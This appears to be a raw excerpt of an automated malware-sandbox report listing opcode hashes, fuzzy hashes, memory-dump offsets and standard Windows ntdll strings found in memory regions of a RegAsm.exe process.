                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a4345c782bd4c700b426de05d61ffd6e02a764d5e3b8fd41ba8a234dc0afe86
                                                                                          • Instruction ID: c3a4ee82600756b2218021d94f023870dc2cdae0d6e6781d02ee719c3865d0b2
                                                                                          • Opcode Fuzzy Hash: 0a4345c782bd4c700b426de05d61ffd6e02a764d5e3b8fd41ba8a234dc0afe86
                                                                                          • Instruction Fuzzy Hash: D10100B4E1074AAFCB04DFA9D945A9EB7F4EF08304F108055E955EB341E674DA40CB51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db654bc262155bb7dac2b2c533b0ee83d80a9da8aecfabdda4b21503de862a29
                                                                                          • Instruction ID: 14a8e97d0f53e617cf1f0b70684fcd5a269d4ce80064003caf5498fd5475599d
                                                                                          • Opcode Fuzzy Hash: db654bc262155bb7dac2b2c533b0ee83d80a9da8aecfabdda4b21503de862a29
                                                                                          • Instruction Fuzzy Hash: F3F0C876B20748ABD704EFB9D905AEEB7B8EF44710F008056E511EB280DAB4DA018750
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ce47ac9ba1503b19d3afd675a8e8c5cfe2957b55c2d7b7a6ed375ba9fa7c9fb3
                                                                                          • Instruction ID: c7ccdfc4b5caad9a95a128a0e9eb58f92f202ba52542a78b6fe0d6cdcef86709
                                                                                          • Opcode Fuzzy Hash: ce47ac9ba1503b19d3afd675a8e8c5cfe2957b55c2d7b7a6ed375ba9fa7c9fb3
                                                                                          • Instruction Fuzzy Hash: ED018F71A202499BCB00DFA9D445AEEB7B8AF48310F18406AE504AB280D778EA41CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                          • Instruction ID: f41deeb2bdec2d055f249fae97de78415a7e3522a9c4e29b5a992fc833cf923e
                                                                                          • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                          • Instruction Fuzzy Hash: 5EF0FC75A35366BFEB10D75D8D40FABBFA89F84610F088655FD019B141D674D9C0C750
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 398ff8c0b71f000a37ec29fa0a6207345f9deac98dce9a96509d42285f9ea9f3
                                                                                          • Instruction ID: 51b46eed22e32a9fef40f242b7d2c5b3f73e917e8d3522b44d407ef3aeda92c2
                                                                                          • Opcode Fuzzy Hash: 398ff8c0b71f000a37ec29fa0a6207345f9deac98dce9a96509d42285f9ea9f3
                                                                                          • Instruction Fuzzy Hash: 5E011EB4A1024A9FDB04DFA9D545B9EF7F4FF08300F148269A519EB381D674DA408B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bbff585d56895fc9c9b75d8640a5ea563c71cd73f252c73e678eb6a743f56ad
                                                                                          • Instruction ID: 9abd4cb81d693f9ceb4ddc400a8e9de58c8a2c94ec1f2280124a16f5f6f6c603
                                                                                          • Opcode Fuzzy Hash: 5bbff585d56895fc9c9b75d8640a5ea563c71cd73f252c73e678eb6a743f56ad
                                                                                          • Instruction Fuzzy Hash: 5AF0F0792247419FE218D7198D01B22329AE7DC750F2A806AEA058F2C1EBB2DC4186D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                          • Instruction ID: 88e11d16ce75b74ff110bd7ed486d1923a015143d585fe9dcef431ba283ef135
                                                                                          • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                          • Instruction Fuzzy Hash: B3F044B6550344BFE711DB64CD41FDA77BCEB04714F100566A655DA190E6B0AA84CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                          • Instruction ID: 006a92d1bb71b7cbe920ec60e84b804e7c1d5a95a17705fa9dad932dfd14bdcc
                                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                          • Instruction Fuzzy Hash: 79F0E935371E1347EF35FA3B8810B2AE2959F84A02B69052E9945CF680DFA0D8C2C7C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90aab2e23827195d3276efd59d51799a39cbe4a35f13dcd226862262f63d75c6
                                                                                          • Instruction ID: f241fbf7fd5a7f8f5267f3f0061494481ea475974b21fc3e86d6f108603daa2f
                                                                                          • Opcode Fuzzy Hash: 90aab2e23827195d3276efd59d51799a39cbe4a35f13dcd226862262f63d75c6
                                                                                          • Instruction Fuzzy Hash: 96F04F75A14349AFCB04EFA9D545A9EB7F4EF08300F408069BA45EB381D6B8DA41CB54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c1746a59c164901f3aaff28f7f4ac386f83494be0f7b8f3be504804348ce41b
                                                                                          • Instruction ID: bd667af02534254f3447c498191a3699096f9e1ca8cd96ff7f06c2839a4877f0
                                                                                          • Opcode Fuzzy Hash: 9c1746a59c164901f3aaff28f7f4ac386f83494be0f7b8f3be504804348ce41b
                                                                                          • Instruction Fuzzy Hash: DCF0F036200B40ABC731EB19DC04F9ABBEDEF88B00F08015DE54287090C7A5A948C650
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c1f6ff7febcbaf98147a32fb0de8ec53b30048cd5e44b7d1d625fe9fe7ed6ab
                                                                                          • Instruction ID: a39b48f8c83c5d8d7598c0a45df89079dcc2edbc1f8829e0b71528d0d72234f6
                                                                                          • Opcode Fuzzy Hash: 4c1f6ff7febcbaf98147a32fb0de8ec53b30048cd5e44b7d1d625fe9fe7ed6ab
                                                                                          • Instruction Fuzzy Hash: 5CF0BE319227E09FD732DBEAC454B73B7D89B08634F0D89AAD68987562CF64D8C0C691
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ea792e59abd88df55ca4c2815e3b2049e0505d4f02fe775a1210f6382966669
                                                                                          • Instruction ID: 189dd6af953195f72c4352e226adcd005b047aa3620844767a8ba127f3a48dc1
                                                                                          • Opcode Fuzzy Hash: 5ea792e59abd88df55ca4c2815e3b2049e0505d4f02fe775a1210f6382966669
                                                                                          • Instruction Fuzzy Hash: 09F09675A20348EFCB04EFA9D905E9EB7F4EF04304F004059E541EB381D678D940CB54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          • API String ID:
                                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                          • Instruction ID: 0d0e1542e49580d045058f3f1247b71dcea1e3a1b707624baa8d7caffa5df5ee
                                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                          • Instruction Fuzzy Hash: 2CC08037250744AFC711DF94CD01F0177A9E798B40F000021F3048B571C571FC50D644
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                          • Instruction ID: 481d1c8636da4f3fd73a9a10d62e70c04b68ef390cee21fc5a89ddbe8e6c3150
                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                          • Instruction Fuzzy Hash: BED01236110248EFCB01DF41C990D9A777AFBD8710F108019FD190B6108A71EDA2DA50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                          • Instruction ID: d12c4a0f694d3121c8acc56e41132134a85106b36f52403baf54af33e2a472d7
                                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                          • Instruction Fuzzy Hash: 48C04C797116418FDF15DB19D294F4577E4F744740F1548D0E945CF721E664E845CA10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 95cb20deb9be37500d688c1f59e551f8ca2bac70ae62597cce759c28dba54c44
                                                                                          • Instruction ID: e6ca32695bcf703fe719f960f0a0a833c6d6aeb31e8fa6c94c21e7fa82ad51b0
                                                                                          • Opcode Fuzzy Hash: 95cb20deb9be37500d688c1f59e551f8ca2bac70ae62597cce759c28dba54c44
                                                                                          • Instruction Fuzzy Hash: FC900231625814129144B1584884546400597E0301B55C011E1424554C8B558A965361
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8d58d3dd592aabf516662bc0445edb513b96a953a9443c90d37a951d12cb087b
                                                                                          • Instruction ID: d42f41317cb7bc77302dd0cece0c3cdcf2a792561a2a6c0c4d80af34b98cef9e
                                                                                          • Opcode Fuzzy Hash: 8d58d3dd592aabf516662bc0445edb513b96a953a9443c90d37a951d12cb087b
                                                                                          • Instruction Fuzzy Hash: 9290022122185842D144B2584804B0F410587E1202F95C019A5156554CCA5689955721
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c8389bb11eb050f2d2f6a154d74b766d70b0818f40e19bdbcb7e8d124a74868c
                                                                                          • Instruction ID: 73c7495a7262bb488b34a28ea42b698789e7face1061b38b1fb47d6dc6f839cb
                                                                                          • Opcode Fuzzy Hash: c8389bb11eb050f2d2f6a154d74b766d70b0818f40e19bdbcb7e8d124a74868c
                                                                                          • Instruction Fuzzy Hash: D790022126141C02D144B15884147070006C7D0601F55C011A1024554D87578AA567B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7021eae59ab1cd2fdf8908f9f6d8242e132048a95c2abd2c0647521e1da421e
                                                                                          • Instruction ID: b0ea867ed335b372f26e45b56aa719bb497f125876a7f6bcefcc5c50a9b37039
                                                                                          • Opcode Fuzzy Hash: e7021eae59ab1cd2fdf8908f9f6d8242e132048a95c2abd2c0647521e1da421e
                                                                                          • Instruction Fuzzy Hash: 9C900471731514434144F15C4C044077005D7F13013D5C115F1554570CC75DCDD5D37D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c18a2bde64c7521f8c56475a84417f18c209b4cf18cdb4bd8b019029415e9dc5
                                                                                          • Instruction ID: 6a076c1d166ef1c77752c220280b8f2df7f03bd020999592cbacf1c4975fc40d
                                                                                          • Opcode Fuzzy Hash: c18a2bde64c7521f8c56475a84417f18c209b4cf18cdb4bd8b019029415e9dc5
                                                                                          • Instruction Fuzzy Hash: C790023162541C02D154B1584414746000587D0301F55C011A1024654D87968B9577A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 84a904543081b250abc0d5f0eb14808a47be04c7576f6dc4f08ee4e0707adf09
                                                                                          • Instruction ID: f13ec76a0ab73787bedcba2790663ebe38168b82470d66258d0ed8e5b4c5ef65
                                                                                          • Opcode Fuzzy Hash: 84a904543081b250abc0d5f0eb14808a47be04c7576f6dc4f08ee4e0707adf09
                                                                                          • Instruction Fuzzy Hash: 5390023122141C02D108B1584804686000587D0301F55C011A7024655E97A689D17231
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 681d58fa52e42489fe10040a84c63b354e867492ef25d01702dc74162d533e70
                                                                                          • Instruction ID: 4d814df50419d94ceab0d4439f378c2a3cb47c6f7fc7142d66036a6bd876c764
                                                                                          • Opcode Fuzzy Hash: 681d58fa52e42489fe10040a84c63b354e867492ef25d01702dc74162d533e70
                                                                                          • Instruction Fuzzy Hash: 9990023122545C42D144B1584404A46001587D0305F55C011A1064694D97668E95B761
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: beca7989c28e39f64e42faa7df346b8644a8f15bfc8874ffc0ce677dce5589ee
                                                                                          • Instruction ID: 2030c2c3455075fc5202c978f03beaf1073c0e14169a278c8c5b5328b302db65
                                                                                          • Opcode Fuzzy Hash: beca7989c28e39f64e42faa7df346b8644a8f15bfc8874ffc0ce677dce5589ee
                                                                                          • Instruction Fuzzy Hash: 9390023122141C02D184B158440464A000587D1301F95C015A1025654DCB568B9977A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a44bab760ba6bf70bbe7ddb6f1c5c9ed9f07c7c4016431ae5ee64af3064e0228
                                                                                          • Instruction ID: b85a32751c45ef44ba80c05429ba557ecf4a272cc4d633af0b4da3276bcf1c87
                                                                                          • Opcode Fuzzy Hash: a44bab760ba6bf70bbe7ddb6f1c5c9ed9f07c7c4016431ae5ee64af3064e0228
                                                                                          • Instruction Fuzzy Hash: DA9002A1221554924504F2588404B0A450587E0201B55C016E2054560CC66689919235
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05c5d91427318aacd038b1cca48aa258cf425e32427833b1d51dbb1eec4cb7ac
                                                                                          • Instruction ID: 256985d9cc68cc9daef0300f234c1856337577e11b37828469ac93e2989541df
                                                                                          • Opcode Fuzzy Hash: 05c5d91427318aacd038b1cca48aa258cf425e32427833b1d51dbb1eec4cb7ac
                                                                                          • Instruction Fuzzy Hash: 47900225231414020149F558060450B044597D6351395C015F2416590CC76289A55321
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 418b428094d9972c842787012dcb5f3bf62dc53845084f86aa79d2ae678b805b
                                                                                          • Instruction ID: e06487d988f49ce938baf019a7e6bea0bcab3aae41e74036bba34252d087e6a3
                                                                                          • Opcode Fuzzy Hash: 418b428094d9972c842787012dcb5f3bf62dc53845084f86aa79d2ae678b805b
                                                                                          • Instruction Fuzzy Hash: 4090043533141403010DF55C07045070047C7D5351355C031F3015550CD773CDF15331
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c3275bbdd49d27b027721e1ad8671fbc11f5eae433c4798eed4fa79310415d60
                                                                                          • Instruction ID: 66f4c0dba3601b3ab5fe01f828df5c1a50c0a26d48fb45097f21f1d246654d53
                                                                                          • Opcode Fuzzy Hash: c3275bbdd49d27b027721e1ad8671fbc11f5eae433c4798eed4fa79310415d60
                                                                                          • Instruction Fuzzy Hash: FA90022126546502D154B15C44046164005A7E0201F55C021A1814594D869689956321
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 992304828e43f72abf355f451c41c91873f61a74796e5558dc5778d6e187b5ab
                                                                                          • Instruction ID: 50ff9555e85b966f42d76a237adc769d177bfe52f8d2cb1f98f0fd67ed21c72e
                                                                                          • Opcode Fuzzy Hash: 992304828e43f72abf355f451c41c91873f61a74796e5558dc5778d6e187b5ab
                                                                                          • Instruction Fuzzy Hash: 7890026136141842D104B1584414B060005C7E1301F55C015E2064554D875ACD926226
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9a9b239a910bda6e56ffb6626c27489b701bc07156bf4a7a264406047d766f04
                                                                                          • Instruction ID: 3a8caf6e15275a8ed8b8f310d9b8a5cbddb79a1a20941636b0ba940a99316aeb
                                                                                          • Opcode Fuzzy Hash: 9a9b239a910bda6e56ffb6626c27489b701bc07156bf4a7a264406047d766f04
                                                                                          • Instruction Fuzzy Hash: 8D90026123141442D108B1584404706004587E1201F55C012A3154554CC66A8DA15225
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 03264787
                                                                                          • ExecuteOptions, xrefs: 032646A0
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03264655
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032646FC
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03264742
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03264725
                                                                                          • Execute=1, xrefs: 03264713
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm
                                                                                          • String ID: +$-$0$0
                                                                                          Strings
                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032602BD
                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032602E7
                                                                                          • RTL: Re-Waiting, xrefs: 0326031E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                          Strings
                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03267B7F
                                                                                          • RTL: Resource at %p, xrefs: 03267B8E
                                                                                          • RTL: Re-Waiting, xrefs: 03267BAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0326728C
                                                                                          Strings
                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03267294
                                                                                          • RTL: Resource at %p, xrefs: 032672A3
                                                                                          • RTL: Re-Waiting, xrefs: 032672C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
